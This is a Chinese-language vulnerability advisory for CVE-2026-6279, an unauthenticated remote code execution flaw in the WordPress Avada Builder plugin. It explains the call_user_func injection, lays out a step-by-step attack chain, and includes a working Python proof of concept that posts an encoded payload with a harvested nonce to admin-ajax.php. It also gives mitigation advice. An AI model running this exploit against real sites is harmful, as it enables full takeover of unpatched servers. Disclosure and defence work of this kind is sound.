IPBUF安全漏洞报告
English
CVE-2026-6279 CVSS 9.8 严重

CVE-2026-6279 WordPress Avada Builder 未授权RCE漏洞

披露日期: 2026-05-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6279
漏洞类型
远程代码执行 (RCE)
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress Avada Builder (fusion-builder)

相关标签

RCEWordPressAvada BuilderPHP Function InjectionUnauthenticatedCVE-2026-6279

漏洞概述

WordPress Avada Builder插件在3.15.2及以下版本中存在严重的未授权远程代码执行(RCE)漏洞。该漏洞源于插件在处理AJAX请求时,未对用户输入进行严格的白名单验证,直接将攻击者控制的数据传递给`call_user_func()`函数。由于保护端点的Nonce可被公开获取,未经身份验证的攻击者可利用此漏洞在受影响的服务器上执行任意PHP代码,从而完全控制站点。

技术细节

漏洞的核心触发点位于`Fusion_Builder_Conditional_Render_Helper::get_value()`方法。当该方法处理`wp_conditional_tags`时,会解析通过Base64编码的JSON数据,并直接将解析后的参数传递给PHP的`call_user_func()`函数,导致函数注入。利用路径是`wp_ajax_nopriv_fusion_get_widget_markup` AJAX端点,该端点允许未授权用户访问。虽然端点受`fusion_load_nonce`保护,但该Nonce是为用户ID 0生成的,并会确定性暴露在包含`[fusion_post_cards]`或`[fusion_table_of_contents]`短代码的页面JavaScript中。攻击者只需提取该Nonce,构造恶意Payload发送至端点,即可触发漏洞并执行任意代码。

攻击链分析

STEP 1
步骤1:信息收集
攻击者访问目标WordPress站点,寻找包含Post Cards或Table of Contents元素的页面,从页面源码中提取JavaScript变量里的`fusion_load_nonce`。
STEP 2
步骤2:构造Payload
攻击者构造包含恶意PHP函数(如`system`或`phpinfo`)的JSON数据,键名为`wp_conditional_tags`,并将该JSON进行Base64编码。
STEP 3
步骤3:发送请求
攻击者向`/wp-admin/admin-ajax.php`发送POST请求,设置`action`为`fusion_get_widget_markup`,并携带窃取的Nonce和编码后的恶意数据。
STEP 4
步骤4:执行代码
服务器端的`Fusion_Builder_Conditional_Render_Helper`处理请求,解码数据并调用`call_user_func()`执行攻击者指定的函数,导致代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import base64 import json target_url = "http://target.com/wp-admin/admin-ajax.php" # 1. Extract 'fusion_load_nonce' from page source containing specific shortcodes nonce = "EXTRACTED_NONCE_VALUE" # 2. Construct malicious payload (e.g., executing phpinfo) payload = { "wp_conditional_tags": "phpinfo" } encoded_data = base64.b64encode(json.dumps(payload).encode()).decode() # 3. Send exploit request data = { "action": "fusion_get_widget_markup", "fusion_load_nonce": nonce, "data": encoded_data } response = requests.post(target_url, data=data) print("Status:", response.status_code) print("Response:", response.text)

影响范围

WordPress Avada Builder (fusion-builder) <= 3.15.2

防御指南

临时缓解措施
建议立即升级插件。如无法升级,可检查并移除页面中泄露Nonce的元素,或通过WAF规则阻断包含恶意特征的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表